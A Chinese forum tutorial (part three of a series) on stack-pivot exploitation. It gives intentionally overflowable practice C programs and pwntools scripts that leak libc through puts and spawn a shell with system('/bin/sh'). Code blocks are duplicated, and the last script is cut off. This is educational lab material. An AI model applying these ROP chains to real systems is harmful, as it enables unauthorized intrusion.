-
-
[原创]钉子户的迁徙之路(三)
-
发表于: 2024-5-10 09:50
-
说明:本篇文章成型很久,现在已退役,后期完善不足,各位师傅将就看吧
前篇地址:
钉子户的迁徙之路(一):https://bbs.kanxue.com/thread-281631.htm
钉子户的迁徙之路(二):https://bbs.kanxue.com/thread-281650.htm
前面这么多的题目让我们有明显的感触,puts 函数就是一个毒瘤。
那么如果想用上面的左右横跳,就必须在高地址布置栈帧,在低地址布置栈帧则必定会被puts栈帧修改覆盖,题目如下
脚本如下
我们把左右横跳之二再加大一些难度,如果仍是8+8的模式,该如何处理。
要解决这个必须,必须巧妙利用call read的各种流程。call read在程序中汇编如下。
在使用call调用函数时,会在栈中压入返回地址,如果调用的函数是输入函数且输入的地址能够覆写压入的地址,就能够在返到我写入的地址处。如下图。需要注意:此时gdb无法n步过call read,必须s进入。
在call read的汇编中,调用第3处或第4处位置时,可以不修改写入的位置,既可以对原来的位置重复写入,在栈确定的情况下,结合call read移形换影可以实现在高地址逐步布置栈帧。为了确保rdi为0,我选取第3处为利用点。流程如下图。
说明:c_r_0为call read0处,c_r_3为call read3处。
脚本如下
我前面说过,迁移到非栈上,1次输入是在非栈上布置栈帧,另1次迁移至非栈上,两次顺序可以互换。我题目中都可是以 data+stack 这种顺序进行输入的,但如果将顺序变为 stack+data 是否有变化。我们既然有了左右横跳之法,那能不能使用呢?
模仿左右横跳,不停利用call read布置栈帧
攻击脚本如下
利用 call read 移形换影将 ret2csu 将 减少为 0x40 字节
migration 0x48 b 0x10 -> ret2csu
migration 0x38 b 0x10 -> call read migration
#include <stdio.h>#include <stdlib.h>#include <unistd.h>int init_func(){
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);
setvbuf(stderr,0,2,0);
return 0;
}int dofunc(){
char b[8] ;
read(0,b,0x20);
puts("byebye!");
return 0;
}int main(){
init_func();
dofunc();
return 0;
}//gcc migration_13.c -fno-stack-protector -no-pie -o migration_13_x64#include <stdio.h>#include <stdlib.h>#include <unistd.h>int init_func(){
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);
setvbuf(stderr,0,2,0);
return 0;
}int dofunc(){
char b[8] ;
read(0,b,0x20);
puts("byebye!");
return 0;
}int main(){
init_func();
dofunc();
return 0;
}//gcc migration_13.c -fno-stack-protector -no-pie -o migration_13_x64from pwn import *
import duchao_pwn_script
from sys import argv
import argparse
s = lambda data: io.send(data)
sa = lambda delim, data: io.sendafter(delim, data)
sl = lambda data: io.sendline(data)
sla = lambda delim, data: io.sendlineafter(delim, data)
r = lambda num=4096: io.recv(num)
ru = lambda delims, drop=True: io.recvuntil(delims, drop)
itr = lambda: io.interactive()
uu32 = lambda data: u32(data.ljust(4, '\0'))
uu64 = lambda data: u64(data.ljust(8, '\0'))
leak = lambda name, addr: log.success('{} = {:#x}'.format(name, addr))
if __name__ == '__main__':
pwn_arch ='amd64'
duchao_pwn_script.init_pwn_linux(pwn_arch)
pwnfile = './migration_13_x64'
io = process(pwnfile)
# io = remote('', )
elf = ELF(pwnfile)
rop = ROP(pwnfile)
context.binary = pwnfile
deadbeef =0xdeadbeef
read_got = elf.got["read"]
read_sym = elf.symbols["read"]
puts_sym = elf.symbols['puts']
leak_func_name = '__libc_start_main'
leak_func_got = elf.got[leak_func_name]
rep_func = elf.symbols['dofunc']
leave_ret = 0x4011D6
call_read_addr = 0x4011aF
ret = 0x4011D7
pop_rdi_ret = 0x40125b
target1_rbp = elf.bss()+0x400
addr_tmp = target1_rbp + 0x100
next_rbp_addr = target1_rbp + 0x300
bin_sh_addr = next_rbp_addr + 0x200
padding2rbp = 0x8
nead_padding2rbp = 0x10
call_read_len = 0x20
stack_over_flow = call_read_len - padding2rbp
# 一、迁移
rbp_1 = target1_rbp
payload1 = flat(['a' * padding2rbp , rbp_1 , call_read_addr])
#pause()
sleep(0.5)
delimiter = 'byebye!\n'
s(payload1)
# 二、布栈
payload = flat([pop_rdi_ret , leak_func_got , puts_sym , rep_func])
for i in range(len(payload)//8):
'''
+----------+ +----------+
| | | |
+----------+ +----------+
| deadbeef | | deadbeef |
+----------+ +----------+
rbp_1 ->| rbp_2 | rbp_2 ->| rbp_1+0x8| +----------+ +----------+
| call read| | call read|
+----------+ +----------+
| gadgat_1 | | |
+----------+ +----------+
| | | |
+----------+ +----------+
| | | |
+----------+ +----------+
'''
rbp_2 = addr_tmp
payload2 = flat([ deadbeef , rbp_2 , call_read_addr , payload[len(payload)-(8*i)-8:len(payload)-(8*i)] ])
#pause()
sleep(0.5)
sa(delimiter,payload2)
'''
+----------+ +----------+ +----------+ +----------+
| | | | | | | |
+----------+ +----------+ +----------+ +----------+
| deadbeef | | deadbeef | | deadbeef | | deadbeef |
+----------+ +----------+ +----------+ +----------+
rbp_1 ->| rbp_2 | rbp_2 ->| rbp_1+0x8| rbp_1 ->| rbp_2 | rbp_2 ->| rbp_1-0x8| +----------+ +----------+ +----------+ +----------+
| call read| | call read| =======> | call read| | call read|
+----------+ +----------+ +----------+ +----------+
| gadgat_1 | | | | gadgat_1 | | |
+----------+ +----------+ +----------+ +----------+
| | | | | | | |
+----------+ +----------+ +----------+ +----------+
| | | | | | | |
+----------+ +----------+ +----------+ +----------+
''' payload3 = flat([ deadbeef ,rbp_1 - 8*(i+1) , call_read_addr ])
#pause()
sleep(0.5)
sa(delimiter,payload3)
#duchao_pwn_script.dbg(io)
payload4 = flat([ ret , ret , ret , ret ])
sa(delimiter,payload4)
ru('byebye!\n')
#pause()
leak_func_addr = u64(r(6).ljust(8,b'\x00')) # 不同接受代码接受数量不同
print(hex(leak_func_addr))
# 以下代码为查找system及/bin/sh的地址
system_addr, binsh_addr = duchao_pwn_script.libcsearch_sys_sh(leak_func_name, leak_func_addr)
print(hex(system_addr))
print(hex(binsh_addr))
# 三、换个姿势再来一次
rbp_1 = next_rbp_addr
payload1 = flat(['a' * padding2rbp , rbp_1 , call_read_addr])
#pause()
sleep(0.5)
delimiter = 'byebye!\n'
s(payload1)
payload = flat([pop_rdi_ret , binsh_addr , ret , system_addr])
for i in range(len(payload)//8):
'''
+----------+ +----------+
| | | |
+----------+ +----------+
| gadgat_1 | | deadbeef |
+----------+ +----------+
rbp_1 ->| rbp_2 | rbp_2 ->| rbp_1+0x8| +----------+ +----------+
| call read| | call read|
+----------+ +----------+
| | | |
+----------+ +----------+
| | | |
+----------+ +----------+
| | | |
+----------+ +----------+
'''
rbp_2 = addr_tmp
payload2 = flat([ deadbeef , rbp_2 , call_read_addr , payload[len(payload)-(8*i)-8:len(payload)-(8*i)] ])
#pause()
sleep(0.5)
sa(delimiter,payload2)
'''
+----------+ +----------+ +----------+ +----------+
| | | | | | | |
+----------+ +----------+ +----------+ +----------+
| gadgat_1 | | deadbeef | | gadgat_1 | | deadbeef |
+----------+ +----------+ +----------+ +----------+
rbp_1 ->| rbp_2 | rbp_2 ->| rbp_1+0x8| rbp_1 ->| gadgat_2 | rbp_2 ->| rbp_1+0x8| +----------+ +----------+ +----------+ +----------+
| call read| | call read| =======> | rbp_2 | | call read|
+----------+ +----------+ +----------+ +----------+
| | | | | call read| | |
+----------+ +----------+ +----------+ +----------+
| | | | | | | |
+----------+ +----------+ +----------+ +----------+
| | | | | | | |
+----------+ +----------+ +----------+ +----------+
''' payload3 = flat([ deadbeef ,rbp_1 - 8*(i+1) , call_read_addr ])
#pause()
sleep(0.5)
sa(delimiter,payload3)
#duchao_pwn_script.dbg(io)
payload4 = flat([ ret , ret , ret , ret ])
sa(delimiter,payload4)
itr()
from pwn import *
import duchao_pwn_script
from sys import argv
import argparse
s = lambda data: io.send(data)
sa = lambda delim, data: io.sendafter(delim, data)
sl = lambda data: io.sendline(data)
sla = lambda delim, data: io.sendlineafter(delim, data)
r = lambda num=4096: io.recv(num)
ru = lambda delims, drop=True: io.recvuntil(delims, drop)
itr = lambda: io.interactive()
uu32 = lambda data: u32(data.ljust(4, '\0'))
uu64 = lambda data: u64(data.ljust(8, '\0'))
leak = lambda name, addr: log.success('{} = {:#x}'.format(name, addr))
if __name__ == '__main__':
pwn_arch ='amd64'
duchao_pwn_script.init_pwn_linux(pwn_arch)
pwnfile = './migration_13_x64'
io = process(pwnfile)
# io = remote('', )
elf = ELF(pwnfile)
rop = ROP(pwnfile)
context.binary = pwnfile
deadbeef =0xdeadbeef
read_got = elf.got["read"]
read_sym = elf.symbols["read"]
puts_sym = elf.symbols['puts']
leak_func_name = '__libc_start_main'
leak_func_got = elf.got[leak_func_name]
rep_func = elf.symbols['dofunc']
leave_ret = 0x4011D6
call_read_addr = 0x4011aF
ret = 0x4011D7
pop_rdi_ret = 0x40125b
target1_rbp = elf.bss()+0x400
addr_tmp = target1_rbp + 0x100
next_rbp_addr = target1_rbp + 0x300
bin_sh_addr = next_rbp_addr + 0x200
padding2rbp = 0x8
nead_padding2rbp = 0x10
call_read_len = 0x20
stack_over_flow = call_read_len - padding2rbp
# 一、迁移
rbp_1 = target1_rbp
payload1 = flat(['a' * padding2rbp , rbp_1 , call_read_addr])
#pause()
sleep(0.5)
delimiter = 'byebye!\n'
s(payload1)
# 二、布栈
payload = flat([pop_rdi_ret , leak_func_got , puts_sym , rep_func])
for i in range(len(payload)//8):
'''
+----------+ +----------+
| | | |
+----------+ +----------+
| deadbeef | | deadbeef |
+----------+ +----------+
rbp_1 ->| rbp_2 | rbp_2 ->| rbp_1+0x8| +----------+ +----------+
| call read| | call read|
+----------+ +----------+
| gadgat_1 | | |
+----------+ +----------+
| | | |
+----------+ +----------+
| | | |
+----------+ +----------+
'''
rbp_2 = addr_tmp
payload2 = flat([ deadbeef , rbp_2 , call_read_addr , payload[len(payload)-(8*i)-8:len(payload)-(8*i)] ])
#pause()
sleep(0.5)
sa(delimiter,payload2)
'''
+----------+ +----------+ +----------+ +----------+
| | | | | | | |
+----------+ +----------+ +----------+ +----------+
| deadbeef | | deadbeef | | deadbeef | | deadbeef |
+----------+ +----------+ +----------+ +----------+
rbp_1 ->| rbp_2 | rbp_2 ->| rbp_1+0x8| rbp_1 ->| rbp_2 | rbp_2 ->| rbp_1-0x8| +----------+ +----------+ +----------+ +----------+
| call read| | call read| =======> | call read| | call read|
+----------+ +----------+ +----------+ +----------+
| gadgat_1 | | | | gadgat_1 | | |
+----------+ +----------+ +----------+ +----------+
| | | | | | | |
+----------+ +----------+ +----------+ +----------+
| | | | | | | |
+----------+ +----------+ +----------+ +----------+
''' payload3 = flat([ deadbeef ,rbp_1 - 8*(i+1) , call_read_addr ])
#pause()
sleep(0.5)
sa(delimiter,payload3)
#duchao_pwn_script.dbg(io)
payload4 = flat([ ret , ret , ret , ret ])
sa(delimiter,payload4)
ru('byebye!\n')
#pause()
leak_func_addr = u64(r(6).ljust(8,b'\x00')) # 不同接受代码接受数量不同
print(hex(leak_func_addr))
# 以下代码为查找system及/bin/sh的地址
system_addr, binsh_addr = duchao_pwn_script.libcsearch_sys_sh(leak_func_name, leak_func_addr)
print(hex(system_addr))
print(hex(binsh_addr))
# 三、换个姿势再来一次
rbp_1 = next_rbp_addr
payload1 = flat(['a' * padding2rbp , rbp_1 , call_read_addr])
#pause()
sleep(0.5)
delimiter = 'byebye!\n'
s(payload1)
payload = flat([pop_rdi_ret , binsh_addr , ret , system_addr])
for i in range(len(payload)//8):
'''
+----------+ +----------+
| | | |
+----------+ +----------+
| gadgat_1 | | deadbeef |
+----------+ +----------+
rbp_1 ->| rbp_2 | rbp_2 ->| rbp_1+0x8| +----------+ +----------+
| call read| | call read|
+----------+ +----------+
| | | |
+----------+ +----------+
| | | |
+----------+ +----------+
| | | |
+----------+ +----------+
'''
rbp_2 = addr_tmp
payload2 = flat([ deadbeef , rbp_2 , call_read_addr , payload[len(payload)-(8*i)-8:len(payload)-(8*i)] ])
#pause()
sleep(0.5)
sa(delimiter,payload2)
'''
+----------+ +----------+ +----------+ +----------+
| | | | | | | |
+----------+ +----------+ +----------+ +----------+
| gadgat_1 | | deadbeef | | gadgat_1 | | deadbeef |
+----------+ +----------+ +----------+ +----------+
rbp_1 ->| rbp_2 | rbp_2 ->| rbp_1+0x8| rbp_1 ->| gadgat_2 | rbp_2 ->| rbp_1+0x8| +----------+ +----------+ +----------+ +----------+
| call read| | call read| =======> | rbp_2 | | call read|
+----------+ +----------+ +----------+ +----------+
| | | | | call read| | |
+----------+ +----------+ +----------+ +----------+
| | | | | | | |
+----------+ +----------+ +----------+ +----------+
| | | | | | | |
+----------+ +----------+ +----------+ +----------+
''' payload3 = flat([ deadbeef ,rbp_1 - 8*(i+1) , call_read_addr ])
#pause()
sleep(0.5)
sa(delimiter,payload3)
#duchao_pwn_script.dbg(io)
payload4 = flat([ ret , ret , ret , ret ])
sa(delimiter,payload4)
itr()
#include <stdio.h>#include <stdlib.h>#include <unistd.h>int init_func(){
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);
setvbuf(stderr,0,2,0);
return 0;
}int dofunc(){
char b[8] ;
read(0,b,0x18);
puts("byebye!");
return 0;
}int main(){
init_func();
dofunc();
return 0;
}//gcc migration_13.c -fno-stack-protector -no-pie -o migration_13_x64#include <stdio.h>#include <stdlib.h>#include <unistd.h>int init_func(){
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);
setvbuf(stderr,0,2,0);
return 0;
}int dofunc(){
char b[8] ;
read(0,b,0x18);
puts("byebye!");
return 0;
}int main(){
init_func();
dofunc();
return 0;
}//gcc migration_13.c -fno-stack-protector -no-pie -o migration_13_x64from pwn import *
import duchao_pwn_script
from sys import argv
import argparse
s = lambda data: io.send(data)
sa = lambda delim, data: io.sendafter(delim, data)
sl = lambda data: io.sendline(data)
sla = lambda delim, data: io.sendlineafter(delim, data)
r = lambda num=4096: io.recv(num)
ru = lambda delims, drop=True: io.recvuntil(delims, drop)
itr = lambda: io.interactive()
uu32 = lambda data: u32(data.ljust(4, '\0'))
uu64 = lambda data: u64(data.ljust(8, '\0'))
leak = lambda name, addr: log.success('{} = {:#x}'.format(name, addr))
if __name__ == '__main__':
pwn_arch ='amd64'
duchao_pwn_script.init_pwn_linux(pwn_arch)
pwnfile = './migration_14_v2_x64'
io = process(pwnfile)
# io = remote('', )
elf = ELF(pwnfile)
rop = ROP(pwnfile)
libcfile = '/lib/x86_64-linux-gnu/libc.so.6'
context.binary = pwnfile
deadbeef =0xdeadbeef
read_got = elf.got["read"]
read_sym = elf.symbols["read"]
puts_sym = elf.symbols['puts']
leak_func_name = '__libc_start_main'
leak_func_got = elf.got[leak_func_name]
rep_func = elf.symbols['dofunc']
csu_front_addr = 0x401238
leave_ret = 0x4011D6
call_read_addr_0 = 0x4011aF # lea rax, [rbp+buf]
call_read_addr_1 = call_read_addr_0 + 4 # set rdx
call_read_addr_2 = call_read_addr_1 + 5 # set rsi = rax
call_read_addr_3 = call_read_addr_2 + 3 # set rdi = 0
call_read_addr_4 = call_read_addr_3 + 5 # call read
call_read_addr = call_read_addr_0
ret = 0x4011D7
pop_rdi_ret = 0x40125b
target1_rbp = elf.bss() + 0x500
addr_tmp = target1_rbp + 0x100
next_rbp_addr = target1_rbp + 0x300
bin_sh_addr = next_rbp_addr + 0x200
padding2rbp = 0x40
nead_padding2rbp = 0x10
call_read_len = 0x20
stack_over_flow = call_read_len - padding2rbp
# 一、迁移
rbp_1 = target1_rbp
payload = flat(['a' * padding2rbp , rbp_1 , call_read_addr])
#pause()
sleep(0.5)
delimiter = 'byebye!\n'
s(payload)
ru(delimiter)
# duchao_pwn_script.dbg(io)
call_func = {'func_addr':read_got , 'arg1': 0, 'arg2': next_rbp_addr, 'arg3': 0x30}
payload_ret2csu = duchao_pwn_script.ret2csu_payload(call_func , 0 , csu_front_addr ,rbp = next_rbp_addr ,gcc_ver='new' )
payload_final = flat([pop_rdi_ret , leak_func_got , puts_sym ]) + payload_ret2csu + p64(leave_ret)
len_payload_final = len(payload_final)
# call read 移形换影布置栈帧
for i in range(len_payload_final//8):
# 第一步
'''
+----------+
| |
+----------+
| deadbeef |
+----------+
rbp_1 ->| rbp_1 | +----------+
| c_r_0 |
+----------+
| |
+----------+
'''
sleep(0.5)
payload = flat(['a' * padding2rbp, rbp_1 - 8*i , call_read_addr])
s(payload)
# 因为调 call_read 所以会有一个 delimiter
ru(delimiter)
# 第二步
'''
+----------+ +----------+
| | | |
+----------+ +----------+
| | rbp_1-0x10->| |
+----------+ +----------+
| deadbeef | | c_r_3 |
+----------+ +----------+
rbp_1 ->| rbp_1 | rbp_1 ->|rbp_1-0x10| +----------+ +----------+
| c_r_0 | =======> | leave_ret|
+----------+ +----------+
| | | |
+----------+ +----------+
'''
sleep(0.5)
payload = flat(['a' * (padding2rbp - 8), call_read_addr_3 , rbp_1 - 0x10 - 0x8*i , leave_ret])
s(payload)
# 第三步
'''
+----------+ +----------+ +----------+
| | | | | |
+----------+ +----------+ +----------+
| | rbp_1-0x10->| | rbp_1-0x10->| |
+----------+ +----------+ +----------+
| deadbeef | | c_r_3 | | rep_func |
+----------+ +----------+ +----------+
rbp_1 ->| rbp_1 | rbp_1 ->|rbp_1-0x10| | deadbeef | +----------+ +----------+ +----------+
| c_r_0 | =======> | leave_ret| =======> | gadget_1 |
+----------+ +----------+ +----------+
| | | | | |
+----------+ +----------+ +----------+
'''
# duchao_pwn_script.dbg(io)
sleep(0.5)
payload = flat(['a' * (padding2rbp - 8), rep_func , deadbeef , payload_final[len_payload_final - (8 * i) - 8 : len_payload_final - (8 * i)]])
s(payload)
duchao_pwn_script.dbg(io)
payload = flat(['a' * padding2rbp , rbp_1 - 0x8 * (len_payload_final//8) , ret])
s(payload)
ru(delimiter)
# 以下代码为查找system及/bin/sh的地址
leak_func_addr = u64(r(6).ljust(8,b'\x00'))
print(hex(leak_func_addr))
system_addr, binsh_addr = duchao_pwn_script.libcsearch_sys_sh(leak_func_name, leak_func_addr ,path = libcfile)
print(hex(system_addr))
print(hex(binsh_addr))
# duchao_pwn_script.dbg(io)
sleep(0.5)
payload = flat([next_rbp_addr ,pop_rdi_ret , binsh_addr , ret, system_addr])
s(payload)
itr()
from pwn import *
import duchao_pwn_script
from sys import argv
import argparse
s = lambda data: io.send(data)
sa = lambda delim, data: io.sendafter(delim, data)
sl = lambda data: io.sendline(data)
sla = lambda delim, data: io.sendlineafter(delim, data)
r = lambda num=4096: io.recv(num)
ru = lambda delims, drop=True: io.recvuntil(delims, drop)
itr = lambda: io.interactive()
uu32 = lambda data: u32(data.ljust(4, '\0'))
uu64 = lambda data: u64(data.ljust(8, '\0'))
leak = lambda name, addr: log.success('{} = {:#x}'.format(name, addr))
if __name__ == '__main__':
pwn_arch ='amd64'
duchao_pwn_script.init_pwn_linux(pwn_arch)
pwnfile = './migration_14_v2_x64'
io = process(pwnfile)
# io = remote('', )
elf = ELF(pwnfile)
rop = ROP(pwnfile)
libcfile = '/lib/x86_64-linux-gnu/libc.so.6'
context.binary = pwnfile
deadbeef =0xdeadbeef
read_got = elf.got["read"]
read_sym = elf.symbols["read"]
puts_sym = elf.symbols['puts']
leak_func_name = '__libc_start_main'
leak_func_got = elf.got[leak_func_name]
rep_func = elf.symbols['dofunc']
csu_front_addr = 0x401238
leave_ret = 0x4011D6
call_read_addr_0 = 0x4011aF # lea rax, [rbp+buf]
call_read_addr_1 = call_read_addr_0 + 4 # set rdx
call_read_addr_2 = call_read_addr_1 + 5 # set rsi = rax
call_read_addr_3 = call_read_addr_2 + 3 # set rdi = 0
call_read_addr_4 = call_read_addr_3 + 5 # call read
call_read_addr = call_read_addr_0
ret = 0x4011D7
pop_rdi_ret = 0x40125b
target1_rbp = elf.bss() + 0x500
addr_tmp = target1_rbp + 0x100
next_rbp_addr = target1_rbp + 0x300
bin_sh_addr = next_rbp_addr + 0x200
padding2rbp = 0x40
nead_padding2rbp = 0x10
call_read_len = 0x20
stack_over_flow = call_read_len - padding2rbp
# 一、迁移
rbp_1 = target1_rbp
payload = flat(['a' * padding2rbp , rbp_1 , call_read_addr])
#pause()
sleep(0.5)
delimiter = 'byebye!\n'
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2024-5-10 10:40
被我超啊编辑
,原因: 补正一些内容
|
|
|---|---|
